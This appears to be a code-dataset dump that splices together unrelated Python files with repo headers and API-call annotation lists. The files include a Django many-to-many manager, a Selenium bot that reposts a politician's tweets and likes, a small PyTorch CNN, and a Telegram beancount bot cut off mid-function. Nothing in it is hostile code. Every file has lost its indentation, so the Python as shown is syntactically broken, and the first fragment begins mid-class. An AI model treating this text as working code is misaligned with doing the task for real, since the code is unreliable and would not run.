# Annotating the query in order to retrieve the primary model
# id in the same query
fk = self.through._meta.get_field(self.field_names['src'])
extra_fields = fk.local_related_fields
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# marking the queryset so that the original queryset should
# be returned when evaluated the first time
qs._related_prefetching = True
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
v = getattr(relobj,
'_prefetch_related_val_%s' % f.attname)
try:
v = v.pop()
except AttributeError: # v is not a list
pass
t.append(f.related_model._meta.pk.to_python(v))
return tuple(t)
# model attribute retrieval function
select_fields = fk.foreign_related_fields
instance_attr = lambda inst: tuple([getattr(inst, f.attname)
for f in select_fields])
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
models = []
objs_set = set()
for obj in objs:
# extract content type and primary key for each object
objs_set.add((get_content_type(obj),
obj.pk))
m = obj.__class__
if m not in models:
# call field.add_relation for each model
models.append(m)
self.field.add_relation(m, auto=True)
vals = self.through._default_manager.using(db) \
.filter(**{self.field_names['src']: self.pk}) \
.values_list(self.field_names['tgt_ct'],
self.field_names['tgt_fk'])
to_add = []
for ct, pk in objs_set.difference(vals):
to_add.append(self.through(**{
'%s_id' % self.field_names['src']: self.pk,
self.field_names['tgt_ct']: ct,
self.field_names['tgt_fk']: pk
}))
return to_add
def _to_remove(self, objs):
q = Q()
for obj in objs:
# Convert the obj to (content_type, primary_key)
q = q | Q(**{
self.field_names['tgt_ct']: get_content_type(obj),
self.field_names['tgt_fk']: obj.pk
})
return q & Q(**{
'%s_id' % self.field_names['src']: self.pk
})
def _to_clear(self):
return {
'%s_id' % self.field_names['src']: self.pk
}
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
to_add = set()
src_fname = self.field_names['src']
ct_fname = self.field_names['tgt_ct']
fk_fname = self.field_names['tgt_fk']
vals = list(self.through._default_manager.using(db)
.filter(**{self.field_names['src']: self.pk})
.values_list(ct_fname, fk_fname))
known_cts = set(v[0] for v in vals)
for obj in objs:
ct = get_content_type(obj)
val = (ct, obj.pk)
try:
vals.remove(val)
except ValueError:
# val is not in vals
# extract content type and primary key for each object
to_add.add((ct, obj.pk))
if ct.pk not in known_cts:
# call field.add_relation for each unknown model
self.field.add_relation(obj.__class__, auto=True)
known_cts.add(ct.pk)
rem_q = Q()
for val in vals:
# Convert the obj to (content_type, primary_key)
rem_q = rem_q | Q(**{
ct_fname: val[0],
fk_fname: val[1]
})
return [
self.through(**{
'%s_id' % src_fname: self.pk,
ct_fname: t[0],
fk_fname: t[1]
}) for t in to_add
], \
rem_q & Q(**{
'%s_id' % src_fname: self.pk
})
def create_gm2m_related_manager(superclass=None, **kwargs):
"""
    Dynamically create a manager class that is bound to a single instance (source
    or target)
"""
bases = [GM2MBaseManager]
if superclass is None:
# no superclass provided, the manager is a generic target model manager
bases.insert(0, GM2MBaseTgtManager)
else:
# superclass provided, the manager is a source model manager and also
# derives from superclass
bases.insert(0, GM2MBaseSrcManager)
bases.append(superclass)
# Django's Manager constructor sets model to None, we store it under the
# class's attribute '_model' and it is retrieved in __init__
kwargs['_model'] = kwargs.pop('model')
return type(Manager)('GM2MManager', tuple(bases), kwargs)
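# Rough usage sketch (call-site names are illustrative; in practice the GM2M field/descriptor builds
# these managers): the keyword arguments become attributes of the generated class, e.g. 'through',
# 'field_names', 'query_field_name', 'prefetch_cache_name', 'field' and 'model', so a call looks like
#   manager_cls = create_gm2m_related_manager(superclass=None, model=..., through=..., field=...,
#                                             field_names=..., query_field_name=..., prefetch_cache_name=...)
#   manager = manager_cls(instance)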
| [((88, 13, 88, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((110, 13, 110, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((129, 13, 129, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((143, 13, 143, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((166, 12, 166, 15), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Manager\n'), ((234, 15, 239, 10), 'django.db.models.Q', 'Q', ({}, {}), "(**{('%s_id__in' % self.field_names['src']): [obj.pk for obj in objs],\n self.field_names['tgt_ct']: inst_ct, self.field_names['tgt_fk']: self.pk})", False, 'from django.db.models import Q, Manager\n'), ((305, 12, 305, 22), 'django.db.models.Q', 'Q', ({}, {}), '(**query)', False, 'from django.db.models import Q, Manager\n'), ((366, 12, 366, 15), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Manager\n'), ((414, 16, 414, 19), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Manager\n'), ((34, 25, 35, 66), 'django.db.router.db_for_read', 'router.db_for_read', (), '', False, 'from django.db import router\n'), ((271, 23, 271, 42), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Manager\n'), ((373, 19, 375, 10), 'django.db.models.Q', 'Q', ({}, {}), "(**{('%s_id' % self.field_names['src']): self.pk})", False, 'from django.db.models import Q, Manager\n'), ((417, 28, 420, 14), 'django.db.models.Q', 'Q', ({}, {}), '(**{ct_fname: val[0], fk_fname: val[1]})', False, 'from django.db.models import Q, Manager\n'), ((429, 16, 431, 10), 'django.db.models.Q', 'Q', ({}, {}), "(**{('%s_id' % src_fname): self.pk})", False, 'from django.db.models import Q, Manager\n'), ((25, 29, 26, 71), 'django.db.router.db_for_read', 'router.db_for_read', (), '', False, 'from django.db import router\n')] |
vitorduarte/RastreadorDeBolso | rastreador-de-bolso/TwitterListener.py | 5c3bab222fced6f0d7367299b5007a628a408b4f | from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import logging
import coloredlogs
import os
import pathlib
import time
import twitter as tt
from utils import retry
from fetch_likes import get_user_likes, login
from conf.settings import USER_ID, USERNAME, PASSWORD
CURR_PATH = pathlib.Path(__file__).parent.absolute()
TWEETS_FOLDER = os.path.join(CURR_PATH, 'screenshots')
LIKED_FOLDER = os.path.join(CURR_PATH, 'screenshots', 'liked')
class TwitterListener():
def __init__(self, user_id=USER_ID, search_base=40):
# Configure log
coloredlogs.install()
logging.basicConfig()
self.logger = logging.getLogger('TwitterListener')
self.logger.setLevel(logging.DEBUG)
# Set chrome options
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument("--no-sandbox")
self.driver = webdriver.Chrome(options=chrome_options)
# Create formatter, file handler and add they to the handlers
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('twitter.log')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
self.search_base = search_base
self.user_id = user_id
self.target = tt.get_username_from_id(user_id)
        self.is_logged = False
self.has_previous_tweets = False
self.has_previous_friends = False
self.has_previous_likes = False
def _get_new_tweets(self):
if(not self.has_previous_tweets):
self.previous_tweets_ids = tt.get_ids_from_tweets(
tt.get_tweets(user_id=self.user_id, count=self.search_base))
self.has_previous_tweets = True
last_tweets = tt.get_tweets(user_id=self.user_id,
count=self.search_base)
last_tweets_ids = tt.get_ids_from_tweets(last_tweets)
diff_tweets = self._get_new_diff(
last_tweets_ids, self.previous_tweets_ids)
if diff_tweets:
new_tweets = [last_tweets[i] for i in range(len(diff_tweets))]
self.previous_tweets_ids = last_tweets_ids
new_tweets.reverse()
return new_tweets
return []
def _get_new_likes(self):
count = self.search_base/2
if(not self.is_logged):
login(self.driver, USERNAME, PASSWORD)
self.is_logged = True
if(not self.has_previous_likes):
self.previous_likes_ids = get_user_likes(
self.driver, self.target, count=count)
self.has_previous_likes = True
new_likes_ids = get_user_likes(
self.driver, self.target, count=count)
diff_tweets = self._get_new_diff(
new_likes_ids, self.previous_likes_ids)
if diff_tweets:
self.previous_likes_ids = new_likes_ids
diff_tweets.reverse()
return diff_tweets
return []
def _get_new_diff(self, curr, old):
count = len(old)
return list(set(curr[:count//2]) -
set(old))
def _get_abs_diff(self, first_list, second_list):
return list(set(first_list) - set(second_list))
def print_new_tweets(self):
try:
new_tweets = self._get_new_tweets()
for tweet in new_tweets:
tweet_id = str(tweet['id'])
tweet_url = tt.get_url(tweet)
# Get image
self.logger.info('New tweet %s', tweet_url)
img_path = os.path.join(TWEETS_FOLDER, f'{tweet_id}.png')
retry(tt.print_tweet, tweet_url,
self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
tweet_msg = 'Jair Bolsonaro acabou de twittar'
self.logger.debug(
f'Is a retweet: {"retweeted_status" in tweet}')
if('retweeted_status' in tweet):
tweet_msg = 'Jair Bolsonaro acabou de retweetar'
tt.tweet_print(img_path, tweet_url, tweet_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def print_new_likes(self):
try:
new_likes = self._get_new_likes()
for t_id in new_likes:
t_url = f'https://twitter.com/{self.target}/status/{t_id}'
# Get image
self.logger.info('New like %s', t_url)
img_path = os.path.join(LIKED_FOLDER, f'{t_id}.png')
retry(tt.print_tweet, t_url, self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
t_msg = 'Jair Bolsonaro acabou de curtir esse tweet'
tt.tweet_print(img_path, t_url, t_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def watch_friends(self):
try:
if(not self.has_previous_friends):
self.previous_friends = tt.get_friends_ids(
user_id=self.user_id)
self.has_previous_friends = True
last_friends = tt.get_friends_ids()
new_friends = self._get_abs_diff(
last_friends, self.previous_friends)
unfriends = self._get_abs_diff(self.previous_friends, last_friends)
for user_id in new_friends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'New friend: @{username}')
retry(
tt.update_status,
status=(
f'Jair Bolsonaro aparentemente está seguindo @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um follow ou por uma reativação de conta)'
)
)
for user_id in unfriends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'Unfriend: @{username}')
retry(
tt.update_status,
status=(
f'Jair Bolsonaro aparentemente deixou de seguir @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um unfollow, suspensão ou block.)'
)
)
self.previous_friends = last_friends
except Exception as e:
self.logger.error(e)
| [((16, 16, 16, 54), 'os.path.join', 'os.path.join', ({(16, 29, 16, 38): 'CURR_PATH', (16, 40, 16, 53): '"""screenshots"""'}, {}), "(CURR_PATH, 'screenshots')", False, 'import os\n'), ((17, 15, 17, 62), 'os.path.join', 'os.path.join', ({(17, 28, 17, 37): 'CURR_PATH', (17, 39, 17, 52): '"""screenshots"""', (17, 54, 17, 61): '"""liked"""'}, {}), "(CURR_PATH, 'screenshots', 'liked')", False, 'import os\n'), ((23, 8, 23, 29), 'coloredlogs.install', 'coloredlogs.install', ({}, {}), '()', False, 'import coloredlogs\n'), ((24, 8, 24, 29), 'logging.basicConfig', 'logging.basicConfig', ({}, {}), '()', False, 'import logging\n'), ((25, 22, 25, 58), 'logging.getLogger', 'logging.getLogger', ({(25, 40, 25, 57): '"""TwitterListener"""'}, {}), "('TwitterListener')", False, 'import logging\n'), ((29, 25, 29, 34), 'selenium.webdriver.chrome.options.Options', 'Options', ({}, {}), '()', False, 'from selenium.webdriver.chrome.options import Options\n'), ((32, 22, 32, 62), 'selenium.webdriver.Chrome', 'webdriver.Chrome', (), '', False, 'from selenium import webdriver\n'), ((34, 20, 35, 67), 'logging.Formatter', 'logging.Formatter', ({(35, 12, 35, 66): '"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'}, {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s')", False, 'import logging\n'), ((36, 13, 36, 47), 'logging.FileHandler', 'logging.FileHandler', ({(36, 33, 36, 46): '"""twitter.log"""'}, {}), "('twitter.log')", False, 'import logging\n'), ((42, 22, 42, 54), 'twitter.get_username_from_id', 'tt.get_username_from_id', ({(42, 46, 42, 53): 'user_id'}, {}), '(user_id)', True, 'import twitter as tt\n'), ((55, 22, 56, 59), 'twitter.get_tweets', 'tt.get_tweets', (), '', True, 'import twitter as tt\n'), ((57, 26, 57, 61), 'twitter.get_ids_from_tweets', 'tt.get_ids_from_tweets', ({(57, 49, 57, 60): 'last_tweets'}, {}), '(last_tweets)', True, 'import twitter as tt\n'), ((80, 24, 81, 50), 'fetch_likes.get_user_likes', 'get_user_likes', (), '', False, 'from fetch_likes import get_user_likes, login\n'), ((15, 12, 15, 34), 'pathlib.Path', 'pathlib.Path', ({(15, 25, 15, 33): '__file__'}, {}), '(__file__)', False, 'import pathlib\n'), ((73, 12, 73, 50), 'fetch_likes.login', 'login', ({(73, 18, 73, 29): 'self.driver', (73, 31, 73, 39): 'USERNAME', (73, 41, 73, 49): 'PASSWORD'}, {}), '(self.driver, USERNAME, PASSWORD)', False, 'from fetch_likes import get_user_likes, login\n'), ((76, 38, 77, 54), 'fetch_likes.get_user_likes', 'get_user_likes', (), '', False, 'from fetch_likes import get_user_likes, login\n'), ((153, 27, 153, 47), 'twitter.get_friends_ids', 'tt.get_friends_ids', ({}, {}), '()', True, 'import twitter as tt\n'), ((52, 16, 52, 75), 'twitter.get_tweets', 'tt.get_tweets', (), '', True, 'import twitter as tt\n'), ((105, 28, 105, 45), 'twitter.get_url', 'tt.get_url', ({(105, 39, 105, 44): 'tweet'}, {}), '(tweet)', True, 'import twitter as tt\n'), ((109, 27, 109, 73), 'os.path.join', 'os.path.join', ({(109, 40, 109, 53): 'TWEETS_FOLDER', (109, 55, 109, 72): 'f"""{tweet_id}.png"""'}, {}), "(TWEETS_FOLDER, f'{tweet_id}.png')", False, 'import os\n'), ((110, 16, 111, 56), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n'), ((122, 16, 122, 62), 'twitter.tweet_print', 'tt.tweet_print', ({(122, 31, 122, 39): 'img_path', (122, 41, 122, 50): 'tweet_url', (122, 52, 122, 61): 'tweet_msg'}, {}), '(img_path, tweet_url, tweet_msg)', True, 'import twitter as tt\n'), ((135, 27, 135, 68), 'os.path.join', 'os.path.join', ({(135, 40, 135, 52): 'LIKED_FOLDER', (135, 54, 135, 67): 'f"""{t_id}.png"""'}, 
{}), "(LIKED_FOLDER, f'{t_id}.png')", False, 'import os\n'), ((136, 16, 136, 79), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n'), ((141, 16, 141, 54), 'twitter.tweet_print', 'tt.tweet_print', ({(141, 31, 141, 39): 'img_path', (141, 41, 141, 46): 't_url', (141, 48, 141, 53): 't_msg'}, {}), '(img_path, t_url, t_msg)', True, 'import twitter as tt\n'), ((149, 40, 150, 41), 'twitter.get_friends_ids', 'tt.get_friends_ids', (), '', True, 'import twitter as tt\n'), ((160, 27, 160, 67), 'twitter.get_username_from_id', 'tt.get_username_from_id', (), '', True, 'import twitter as tt\n'), ((162, 16, 169, 17), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n'), ((172, 27, 172, 67), 'twitter.get_username_from_id', 'tt.get_username_from_id', (), '', True, 'import twitter as tt\n'), ((174, 16, 181, 17), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n')] |
pierrealixt/SmartExcel | smartexcel/tests/data/data_models/dummy.py | 19c5b7e6110db3d42965228ea2ae44a65489ac71 | class Dummy():
def __init__(self, data):
self.name = data['name']
self.age = data['age']
self.city = data['city']
class DummyData():
def __init__(self):
self.results = [
Dummy({
'name': 'PA',
'age': 29,
'city': 'Paris'
}),
Dummy({
'name': 'Cairo',
'age': 0,
'city': 'Muizenberg'
}),
Dummy({
'name': 'Carina',
'age': 26,
'city': 'Windhoek'
})
]
def write_name(self, instance, kwargs={}):
return instance.name
def write_age(self, instance, kwargs={}):
return instance.age
def write_city(self, instance, kwargs={}):
return instance.city
def get_age_list(self):
return [i for i in range(0, 99)]
def get_city_list(self):
return [
'Paris',
'Muizenberg',
'Windhoek',
'Saint-Dizier'
]
def write_get_repeat_func(self):
return len(self.results)
def write_get_name_func(self, instance, kwargs={}):
return self.results[kwargs['index']].name
| [] |
HariKrishna-Vydana/ASR_Transformer | ASR_TransV1/Load_sp_model.py | a37dc7f1add148b14ca1d265d72fc4e9d9dd0fc0 | #!/usr/bin/python
import sys
import os
from os.path import join, isdir
import sentencepiece as spm
#--------------------------
def Load_sp_models(PATH):
PATH_model = spm.SentencePieceProcessor()
PATH_model.Load(join(PATH))
return PATH_model
#--------------------------
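# Example (the model path is hypothetical):
#   bpe = Load_sp_models('exp/bpe_1000.model')
#   ids = bpe.EncodeAsIds('hello world')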
| [((10, 21, 10, 49), 'sentencepiece.SentencePieceProcessor', 'spm.SentencePieceProcessor', ({}, {}), '()', True, 'import sentencepiece as spm\n'), ((11, 24, 11, 34), 'os.path.join', 'join', ({(11, 29, 11, 33): 'PATH'}, {}), '(PATH)', False, 'from os.path import join, isdir\n')] |
leith-bartrich/fiepipe_desktop | fiepipedesktoplib/gitlabserver/shell/manager.py | 5136141d67a59e9a2afb79f368a6a02f2d61d2da | import typing
from fiepipelib.gitlabserver.data.gitlab_server import GitLabServer
from fiepipelib.gitlabserver.routines.manager import GitLabServerManagerInteractiveRoutines
from fiepipedesktoplib.gitlabserver.shell.gitlab_hostname_input_ui import GitLabHostnameInputDefaultShellUI
from fiepipedesktoplib.gitlabserver.shell.gitlab_username_input_ui import GitLabUsernameInputDefaultShellUI
from fiepipedesktoplib.gitlabserver.shell.gitlab_private_token_input_ui import GitLabPrivateTokenInputDefaultShellUI
from fiepipedesktoplib.gitlabserver.shell.gitlabserver import GitLabServerShell
from fiepipedesktoplib.gitlabserver.shell.server_name_var_command import GitLabServerNameVar
from fiepipedesktoplib.locallymanagedtypes.shells.AbstractLocalManagedTypeCommand import LocalManagedTypeCommand
from fiepipedesktoplib.shells.AbstractShell import AbstractShell
from fiepipedesktoplib.shells.variables.fqdn_var_command import FQDNVarCommand
class GitLabServerManagerShell(LocalManagedTypeCommand[GitLabServer]):
def get_routines(self) -> GitLabServerManagerInteractiveRoutines:
return GitLabServerManagerInteractiveRoutines(feedback_ui=self.get_feedback_ui(),
hostname_input_default_ui=GitLabHostnameInputDefaultShellUI(self),
username_input_default_ui=GitLabUsernameInputDefaultShellUI(self),
private_token_input_default_ui=GitLabPrivateTokenInputDefaultShellUI(self))
def get_shell(self, item: GitLabServer) -> AbstractShell:
# no shell currently. We call super instead.
server_name = GitLabServerNameVar()
server_name.set_value(item.get_name())
return GitLabServerShell(server_name)
def get_plugin_names_v1(self) -> typing.List[str]:
ret = super(GitLabServerManagerShell, self).get_plugin_names_v1()
ret.append("gitlabserver.manager")
return ret
def get_prompt_text(self) -> str:
return self.prompt_separator.join(['GitLabServer', 'Manager'])
def main():
shell = GitLabServerManagerShell()
shell.cmdloop()
if __name__ == '__main__':
main()
| [((25, 22, 25, 43), 'fiepipedesktoplib.gitlabserver.shell.server_name_var_command.GitLabServerNameVar', 'GitLabServerNameVar', ({}, {}), '()', False, 'from fiepipedesktoplib.gitlabserver.shell.server_name_var_command import GitLabServerNameVar\n'), ((27, 15, 27, 45), 'fiepipedesktoplib.gitlabserver.shell.gitlabserver.GitLabServerShell', 'GitLabServerShell', ({(27, 33, 27, 44): 'server_name'}, {}), '(server_name)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlabserver import GitLabServerShell\n'), ((19, 80, 19, 119), 'fiepipedesktoplib.gitlabserver.shell.gitlab_hostname_input_ui.GitLabHostnameInputDefaultShellUI', 'GitLabHostnameInputDefaultShellUI', ({(19, 114, 19, 118): 'self'}, {}), '(self)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlab_hostname_input_ui import GitLabHostnameInputDefaultShellUI\n'), ((20, 80, 20, 119), 'fiepipedesktoplib.gitlabserver.shell.gitlab_username_input_ui.GitLabUsernameInputDefaultShellUI', 'GitLabUsernameInputDefaultShellUI', ({(20, 114, 20, 118): 'self'}, {}), '(self)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlab_username_input_ui import GitLabUsernameInputDefaultShellUI\n'), ((21, 85, 21, 128), 'fiepipedesktoplib.gitlabserver.shell.gitlab_private_token_input_ui.GitLabPrivateTokenInputDefaultShellUI', 'GitLabPrivateTokenInputDefaultShellUI', ({(21, 123, 21, 127): 'self'}, {}), '(self)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlab_private_token_input_ui import GitLabPrivateTokenInputDefaultShellUI\n')] |
gaochangfeng/fairseq | fairseq/models/wav2vec/eteh_model/transformer/repeat.py | 70a468230b8fb558caa394322b02fface663e17a | import torch
class MultiSequential(torch.nn.Sequential):
"""Multi-input multi-output torch.nn.Sequential"""
def forward(self, *args):
for m in self:
args = m(*args)
return args
def repeat(N, fn):
"""repeat module N times
    :param int N: number of times to repeat
:param function fn: function to generate module
:return: repeated modules
:rtype: MultiSequential
"""
return MultiSequential(*[fn(n) for n in range(N)])
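# Usage note: MultiSequential unpacks each module's return value into the next module's call
# (args = m(*args)), so the repeated modules are expected to return a tuple of outputs, as
# transformer encoder/decoder layers returning (x, mask) do. A hypothetical example:
#   layers = repeat(6, lambda n: EncoderLayer(...))  # EncoderLayer is illustrative, not defined here
#   x, mask = layers(x, mask)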
| [] |
troncosoae/jetson-exp | torch_lib/Nets.py | 0c1a46b969b95bb9c350f78955ae6ca7f41b43b5 | import torch
import torch.nn as nn
import torch.nn.functional as F
class MediumNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(
3, out_channels=6, kernel_size=5, padding=0)
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv2 = nn.Conv2d(
6, out_channels=16, kernel_size=5, padding=0)
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)
self.fc1 = nn.Linear(16*5*5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool1(F.relu(self.conv1(x)))
x = self.pool2(F.relu(self.conv2(x)))
x = torch.flatten(x, 1) # flatten all dimensions except batch
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
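# Quick shape check (assumes 32x32 RGB inputs, e.g. CIFAR-10-sized images):
#   net = MediumNet()
#   out = net(torch.randn(1, 3, 32, 32))  # -> torch.Size([1, 10])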
| [((9, 21, 10, 56), 'torch.nn.Conv2d', 'nn.Conv2d', (), '', True, 'import torch.nn as nn\n'), ((11, 21, 11, 58), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (), '', True, 'import torch.nn as nn\n'), ((12, 21, 13, 57), 'torch.nn.Conv2d', 'nn.Conv2d', (), '', True, 'import torch.nn as nn\n'), ((14, 21, 14, 58), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (), '', True, 'import torch.nn as nn\n'), ((15, 19, 15, 41), 'torch.nn.Linear', 'nn.Linear', ({(15, 29, 15, 35): '16 * 5 * 5', (15, 37, 15, 40): '120'}, {}), '(16 * 5 * 5, 120)', True, 'import torch.nn as nn\n'), ((16, 19, 16, 37), 'torch.nn.Linear', 'nn.Linear', ({(16, 29, 16, 32): '120', (16, 34, 16, 36): '84'}, {}), '(120, 84)', True, 'import torch.nn as nn\n'), ((17, 19, 17, 36), 'torch.nn.Linear', 'nn.Linear', ({(17, 29, 17, 31): '84', (17, 33, 17, 35): '10'}, {}), '(84, 10)', True, 'import torch.nn as nn\n'), ((22, 12, 22, 31), 'torch.flatten', 'torch.flatten', ({(22, 26, 22, 27): 'x', (22, 29, 22, 30): '1'}, {}), '(x, 1)', False, 'import torch\n')] |
umousesonic/zinc | test123.py | 9e170269d3b209a80ac79d5850894ddc1d95c62f | from runner import runner
if __name__ == '__main__':
r = runner()
p = 'public class main{public static void main (String[] args){' \
'public String StudentAnswer(String myInput){' \
'return "myOutput"; ' \
'}System.out.println("hello world!");}}'
print (r.sendCode(p, '')) | [((4, 8, 4, 16), 'runner.runner', 'runner', ({}, {}), '()', False, 'from runner import runner\n')] |
dumbPy/beancount_bot | beancount_bot/bot.py | 388a17f165c22b30e7f6377161eb5bf63578168a | import traceback
import telebot
from telebot import apihelper
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery
from beancount_bot import transaction
from beancount_bot.config import get_config, load_config
from beancount_bot.dispatcher import Dispatcher
from beancount_bot.i18n import _
from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session
from beancount_bot.task import load_task, get_task
from beancount_bot.transaction import get_manager
from beancount_bot.util import logger
apihelper.ENABLE_MIDDLEWARE = True
bot = telebot.TeleBot(token=None, parse_mode=None)
@bot.middleware_handler(update_types=['message'])
def session_middleware(bot_instance, message):
"""
Session middleware
:param bot_instance:
:param message:
:return:
"""
bot_instance.session = get_session_for(message.from_user.id)
#######
# Authentication #
#######
def check_auth() -> bool:
"""
    Check whether the current session is authenticated
:return:
"""
return SESS_AUTH in bot.session and bot.session[SESS_AUTH]
@bot.message_handler(commands=['start'])
def start_handler(message: Message):
"""
    Authenticate the user on first contact
:param message:
:return:
"""
auth = get_session(message.from_user.id, SESS_AUTH, False)
if auth:
bot.reply_to(message, _("Have been authenticated!"))
return
    # Request authentication
bot.reply_to(message, _("Welcome to the accounting robot!Please enter the authentication token:"))
def auth_token_handler(message: Message):
"""
Login token callback
:param message:
:return:
"""
if check_auth():
return
    # Messages from unauthenticated users are treated as authentication tokens
auth_token = get_config('bot.auth_token')
if auth_token == message.text:
set_session(message.from_user.id, SESS_AUTH, True)
bot.reply_to(message, _("Authentic success!"))
else:
bot.reply_to(message, _("Authentication token error!"))
#######
# Commands #
#######
@bot.message_handler(commands=['reload'])
def reload_handler(message):
"""
    Reload configuration command
:param message:
:return:
"""
if not check_auth():
bot.reply_to(message, _("Please conduct authentication first!"))
return
load_config()
load_task()
bot.reply_to(message, _("Successful overload configuration!"))
@bot.message_handler(commands=['help'])
def help_handler(message):
"""
    Help command
:param message:
:return:
"""
cmd = message.text
dispatchers = get_manager().dispatchers
if cmd == '/help':
# Create a message button
markup = InlineKeyboardMarkup()
for ind, d in zip(range(len(dispatchers)), dispatchers):
help_btn = _("help:{name}").format(name=d.get_name())
markup.add(InlineKeyboardButton(help_btn, callback_data=f'help:{ind}'))
        # Help message
command_usage = [
_("/start - Authentication"),
_("/help - Using help"),
_("/reload - Reload the configuration file"),
_("/task - View, run the task"),
]
help_text = \
_("Account bill Bot\n\nAvailable instruction list:\n{command}\n\nTrade statement syntax help, select the corresponding module,Use /help [Module name] Check.").format(
command='\n'.join(command_usage))
bot.reply_to(message, help_text, reply_markup=markup)
else:
# Display detailed help
name: str = cmd[6:]
flag_found = False
for d in dispatchers:
if name.lower() == d.get_name().lower():
show_usage_for(message, d)
flag_found = True
if not flag_found:
bot.reply_to(message, _("The corresponding name of the transaction statement processor does not exist!"))
def show_usage_for(message: Message, d: Dispatcher):
"""
    Show usage for a specific dispatcher
:param message:
:param d:
:return:
"""
usage = _("help:{name}\n\n{usage}").format(name=d.get_name(), usage=d.get_usage())
bot.reply_to(message, usage)
@bot.callback_query_handler(func=lambda call: call.data[:4] == 'help')
def callback_help(call: CallbackQuery):
"""
    Detailed help callback for a dispatcher
:param call:
:return:
"""
try:
d_id = int(call.data[5:])
dispatchers = get_manager().dispatchers
show_usage_for(call.message, dispatchers[d_id])
except Exception as e:
logger.error(f'{call.id}:Unknown error!', e)
logger.error(traceback.format_exc())
bot.answer_callback_query(call.id, _("Unknown error!\n"+traceback.format_exc()))
@bot.message_handler(commands=['task'])
def task_handler(message):
"""
    Task command
:param message:
:return:
"""
if not check_auth():
bot.reply_to(message, _("Please conduct authentication first!"))
return
cmd = message.text
tasks = get_task()
if cmd == '/task':
# Show all tasks
all_tasks = ', '.join(tasks.keys())
bot.reply_to(message,
_("Current registration task:{all_tasks}\n"
"able to pass /task [Task Name] Active trigger").format(all_tasks=all_tasks))
else:
# Run task
dest = cmd[6:]
if dest not in tasks:
bot.reply_to(message, _("Task does not exist!"))
return
task = tasks[dest]
task.trigger(bot)
#######
# Transactions #
#######
@bot.message_handler(func=lambda m: True)
def transaction_query_handler(message: Message):
"""
    Handle transaction statements
:param message:
:return:
"""
if not check_auth():
auth_token_handler(message)
return
    # Process the transaction statement
manager = get_manager()
try:
tx_uuid, tx = manager.create_from_str(message.text)
# Create a message button
markup = InlineKeyboardMarkup()
markup.add(InlineKeyboardButton(_("Revoke trading"), callback_data=f'withdraw:{tx_uuid}'))
        # Reply
bot.reply_to(message, transaction.stringfy(tx), reply_markup=markup)
except ValueError as e:
logger.info(f'{message.from_user.id}:Unable to add transactions', e)
bot.reply_to(message, e.args[0])
except Exception as e:
logger.error(f'{message.from_user.id}:An unknown mistake!Adding a transaction failed.', e)
bot.reply_to(message, _("An unknown mistake!Adding a transaction failed.\n"+traceback.format_exc()))
@bot.callback_query_handler(func=lambda call: call.data[:8] == 'withdraw')
def callback_withdraw(call: CallbackQuery):
"""
Transaction withdrawal callback
:param call:
:return:
"""
auth = get_session(call.from_user.id, SESS_AUTH, False)
if not auth:
bot.answer_callback_query(call.id, _("Please conduct authentication first!"))
return
tx_uuid = call.data[9:]
manager = get_manager()
try:
manager.remove(tx_uuid)
# Modify the original message reply
message = _("Transaction has been withdrawn")
code_format = MessageEntity('code', 0, len(message))
bot.edit_message_text(message,
chat_id=call.message.chat.id,
message_id=call.message.message_id,
entities=[code_format])
except ValueError as e:
logger.info(f'{call.id}:Unable to create trading', e)
bot.answer_callback_query(call.id, e.args[0])
except Exception as e:
logger.error(f'{call.id}:An unknown mistake!Withdrawal of the transaction failed.', e)
bot.answer_callback_query(call.id, _("An unknown mistake!Withdrawal of the transaction failed."))
def serving():
"""
    Start the bot
:return:
"""
    # Set the token
token = get_config('bot.token')
bot.token = token
# Set a proxy
proxy = get_config('bot.proxy')
if proxy is not None:
